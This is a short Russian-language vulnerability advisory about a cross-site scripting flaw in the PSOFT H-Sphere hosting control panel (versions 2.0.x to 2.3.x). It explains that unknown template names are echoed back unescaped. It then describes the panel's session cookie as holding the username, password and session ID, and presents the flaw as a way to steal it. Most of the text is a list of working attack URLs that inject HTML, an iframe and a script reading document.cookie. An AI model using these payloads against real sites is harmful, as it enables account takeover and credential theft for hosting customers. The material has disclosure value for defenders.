Продутк : PSOFT H-Sphere ( Hosting Control Panel )
Уязвимые Версии :2.3.x, 2.2.x, 2.1.x, 2.0.x

Описание:

Система, которая добавляет HTML файлы, содержит
уязвимость. Если страница не существует, система
печатает Error:

Unknown template : ‘[ПУТЬ К НЕСЩЕСТВУЮЩЕЙ СТРАНИЦЕ]’

при помощи этого вы можете вставлять хтмл или скрипт код вот так:

http://[ЖЕРТВА]/[ПУТЬ К PSOFT H-SPHERE INSTALLATION] /servlet/psoft.hsphere.CP/ [СУЩЕСТВУЮЩИЙ И ЗАЛОГИНИНЫЙ ЮЗЕР]/
[ID]/[ПУТЬ К H-SPHERE ЮЕЗРСКОМУ СКРИПТУ]/ servlet/psoft.hsphere.CP?
template_name=[ЗДЕСЬ ИДЕТ ВАШ КОД]

Новый Error выдаст:

Unknown template : ‘[ЗДЕСЬ ИДЕТ ВАШ КОД]’

И веб навигатор юзера выпонит любой код находящий на этой странице. Например для кражи кукисов:

MACTOKEN=[USER]|0000000xxxxxx| 0xxxxx0000xxxx0000xxxx0000xxxx00 ESTRUCTURE OF H-SPHERE COOKIE :
MACTOKEN=[USERNAME] | [ USER PASSWORD ] | [ USER SESSION ID ]

Примеры Атак:

http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP? action=login&ftemplate=[MORE CODE AND
XSS]&requestURL=»><h1>XSS%20in%20PSOFT%20SPHERE <a%20href=»https://xakep.ru/wp-content/uploads/post/18808/&login=[USERNAME]&
password=[PASSWORD] 

http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/ psoft.hsphere.CP?template
_name=<H1>xss</H1>

http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/ [USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<IFRAME>

http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP /[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<h1>XSS

http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/ [USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<script>alert(document.cookie);</script>



Оставить мнение